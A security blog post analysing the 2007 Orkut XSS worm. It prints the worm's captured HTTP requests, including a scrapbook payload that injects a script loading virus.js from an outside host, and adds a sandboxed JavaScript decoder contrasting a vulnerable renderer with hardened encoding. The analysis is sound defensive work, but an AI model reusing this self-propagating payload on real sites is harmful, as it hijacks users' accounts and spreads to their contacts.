web application security lab

Orkut XSS Worm

Several people sent this to me over the last few days, but for those of you who hadn’t seen it in the myriad of places it showed up: Orkut was hit by an XSS worm. Orkut is Google’s version of social networking. It was big for a while, but I think most people bailed in favor of the more open MySpaces and Facebooks of the world. It’s still widely used by the Portuguese-speaking population, though.

Rough estimates put the number of compromised accounts north of 300,000, even though it was caught relatively quickly. It’s amazing how fast these things grow in an environment like that, where the medium for spreading is a technology almost everyone uses and that works across platforms. I think the only things stopping this one from being even more virulent were a payload that was not fully cross-platform and social engineering that could have been a little more seamless.

Here are the POST requests sent in by Lavakumar:

POST request sent by the worm to add the victim to the “Infectados pelo Vírus do Orkut” (“Infected by the Orkut Virus”) community. The community id is “44001818”. Note that this request and the scrapbook request below carry the same POST_TOKEN and signature values: because the worm’s JavaScript runs inside the victim’s own Orkut session, it can lift whatever anti-CSRF tokens the page exposes and replay them, so those tokens offer no protection against XSS.

POST /CommunityJoin.aspx?cmm=44001818 HTTP/1.1
Host: www.orkut.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: http://www.orkut.com/Scrapbook.aspx?uid=<-xxxxxxxxxxxxxxxxxxxx->
Cookie: -xxxxxxxxx-
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 98

POST_TOKEN=0B57493EBE09C74A3D69298F67635479&signature=Bm1YihIUAe5I%2BAvfFH7v4bjtdrI%3D&Action.join

——————————————————————————————————————————————————

POST request sent by the worm to post itself to the scrapbook of each of the victim’s friends (the toUserId parameter selects the recipient).

POST /Scrapbook.aspx HTTP/1.1
Host: www.orkut.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: http://www.orkut.com/Scrapbook.aspx?uid=-xxxxxxxxx-
Cookie: -xxxxxxxxx-
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 146

Action.submit=1&POST_TOKEN=0B57493EBE09C74A3D69298F67635479&scrapText=2008%20vem%20ai...%20que%20ele%20comece%20mto%20bem%20para%20vc%3Cbr%2F%3E%5Bsilver%5DRL%20Wed%20Dec%2019%202007%2009%3A52%3A21%20GMT%2B0530%20(India%20Standard%20Time)%5B%2Fsilver%5D%3Cbr%2F%3E%3Cembed%20src%3D%22http%3A%2F%2Fwww.orkut.com%2FLoL.aspx%22%20type%3D%22application%2Fx-shockwave-flash%22%20wmode%3D%22transparent')%3B%20script%3Ddocument.createElement('script')%3Bscript.src%3D'http%3A%2F%2Ffiles.myopera.com%2Fvirusdoorkut%2Ffiles%2Fvirus.js'%3Bdocument.getElementsByTagName('head')%5B0%5D.appendChild(script)%3Bescape('%22%20%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fembed%3E&signature=Bm1YihIUAe5I%2BAvfFH7v4bjtdrI%3D&toUserId=14668216
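The scrapText value is the whole exploit, so it is worth decoding. What follows is an added example, not the worm’s code (that lives at the virus.js URL) and not Orkut’s server code: it URL-decodes the captured parameter, parses the embed tag the way a tolerant HTML filter would, and shows what happens when a server re-serializes that tag into a single-quoted JavaScript string literal. The `writeFlash('...')` rendering step is an inference from the payload’s shape (`wmode="transparent')` closes a string and a call, and the trailing `escape('` reopens a string to swallow the rest of the tag), not a copy of Orkut’s actual code; the function names, the wmode allowlist, the src check and the sandbox are assumptions made for the demonstration. The smart quotes the blog software put into the capture have been restored to the ASCII apostrophes the worm would have sent.

```javascript
// Added example, not the worm's code and not Orkut's: decode the captured
// scrapText parameter and show why the wmode attribute value is an injection
// into a JavaScript string. The rendering step (writeFlash) is an ASSUMPTION
// inferred from the payload shape; Orkut's real server code is not known here.

// scrapText as captured above, still percent-encoded, with the blog's smart
// quotes restored to the ASCII apostrophes the worm would have sent.
const SCRAP_TEXT_ENCODED =
  "2008%20vem%20ai...%20que%20ele%20comece%20mto%20bem%20para%20vc%3Cbr%2F%3E" +
  "%5Bsilver%5DRL%20Wed%20Dec%2019%202007%2009%3A52%3A21%20GMT%2B0530%20" +
  "(India%20Standard%20Time)%5B%2Fsilver%5D%3Cbr%2F%3E%3Cembed%20src%3D%22" +
  "http%3A%2F%2Fwww.orkut.com%2FLoL.aspx%22%20type%3D%22application%2F" +
  "x-shockwave-flash%22%20wmode%3D%22transparent')%3B%20script%3Ddocument." +
  "createElement('script')%3Bscript.src%3D'http%3A%2F%2Ffiles.myopera.com%2F" +
  "virusdoorkut%2Ffiles%2Fvirus.js'%3Bdocument.getElementsByTagName('head')" +
  "%5B0%5D.appendChild(script)%3Bescape('%22%20%20width%3D%221%22%20height" +
  "%3D%221%22%3E%3C%2Fembed%3E";

// Decode an application/x-www-form-urlencoded value ('+' is a space).
function decodeFormValue(v) {
  return decodeURIComponent(v.replace(/\+/g, " "));
}

// Read the <embed> attributes the way a tolerant HTML filter would: each value
// runs to the next double quote, so the apostrophes, parentheses and
// semicolons inside wmode look like plain attribute text and pass.
function parseEmbedAttrs(html) {
  const tag = html.match(/<embed\b([^>]*)>/i);
  if (!tag) return null;
  const attrs = {};
  for (const m of tag[1].matchAll(/(\w+)="([^"]*)"/g)) attrs[m[1]] = m[2];
  return attrs;
}

// Re-serialize the filtered attributes into a tag (shared by both renderers).
function buildTag(a) {
  return `<embed src="${a.src}" type="${a.type}" wmode="${a.wmode}" ` +
         `width="${a.width}" height="${a.height}"></embed>`;
}

// ASSUMED vulnerable pattern: the tag is dropped into a single-quoted JS
// string literal with no JS-context escaping, so the ' in wmode ends the
// literal and everything after it is code.
function renderEmbedVulnerable(a) {
  return `writeFlash('${buildTag(a)}');`;
}

// Correct output encoding for a JS-string context: JSON.stringify produces a
// valid literal for any input, and \u003c keeps "</script>" from closing the
// surrounding script block when this lands in HTML.
function toJsLiteral(s) {
  return JSON.stringify(s).replace(/</g, "\\u003c");
}

// Hardened renderer: allowlist the values that have a fixed vocabulary, then
// encode for the output context anyway (defence in depth).
const WMODE_ALLOWED = new Set(["window", "opaque", "transparent"]);
function renderEmbedHardened(a) {
  if (!WMODE_ALLOWED.has(a.wmode)) throw new Error("wmode rejected: " + a.wmode);
  if (!/^\d{1,4}$/.test(a.width) || !/^\d{1,4}$/.test(a.height)) throw new Error("size rejected");
  if (!/^https?:\/\/[\w.-]+\/[^\s"'<>]*$/.test(a.src)) throw new Error("src rejected: " + a.src);
  return `writeFlash(${toJsLiteral(buildTag(a))});`;
}

// Execute generated script text with stand-in globals so nothing touches the
// network: the fake document records every <script> element the code creates.
function runInSandbox(scriptText) {
  const created = [];
  const flashCalls = [];
  const fakeDocument = {
    createElement: (name) => { const el = { tagName: name }; created.push(el); return el; },
    getElementsByTagName: () => [{ appendChild: () => {} }],
  };
  new Function("document", "writeFlash", "escape", "script", scriptText)(
    fakeDocument, (t) => flashCalls.push(t), (s) => s, undefined);
  return { flashCalls, injectedScripts: created.map((el) => el.src) };
}

function analyze() {
  const attrs = parseEmbedAttrs(decodeFormValue(SCRAP_TEXT_ENCODED));
  const vuln = runInSandbox(renderEmbedVulnerable(attrs));
  let hardened;
  try { renderEmbedHardened(attrs); hardened = "accepted"; } catch (e) { hardened = e.message; }
  // Encoding alone, with no allowlist, already turns the payload back into data.
  const escapedOnly = runInSandbox(`writeFlash(${toJsLiteral(buildTag(attrs))});`);
  // A benign scrap with the same tag shape still renders through the hardened path.
  const benign = runInSandbox(renderEmbedHardened({ ...attrs, wmode: "transparent" }));
  return { wmode: attrs.wmode, vuln, hardened, escapedOnly, benign };
}

console.log(JSON.stringify(analyze(), null, 2));
```

Run under Node. In the vulnerable path the sandbox shows `writeFlash` receiving only the truncated tag while a script element pointing at virus.js gets created and appended, which is exactly the worm's loader; with context-correct encoding the same bytes reach `writeFlash` as one inert string, and the allowlist rejects the value before it is ever rendered.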

The code can be found in many places around the net, but I also threw up a copy in the sla.ckers.org XSS worm section for anyone looking for example worm code. I’m trying to keep that section up to date with practical, real-world worm code rather than theoretical examples, so we can all see it. Google has fixed this issue, but it is unclear what the fallout from the damage will be.

One Response to “Orkut XSS Worm”

  1. Kishor Says:

    Yeah. That worm did affect my scrapbook and sent scraps on my behalf to my friends.

    It also added you to a community named “Infectados pelo Vírus do Orkut”.

    Number of members on that community as of today is 543,355. So considering people who unjoined it, the number of people affected was > 543,355.

    I have found another issue related to privacy that can really be an issue on many sites.
    http://wasjournal.blogspot.com/2007/12/orkut-private-videos-are-not-private.html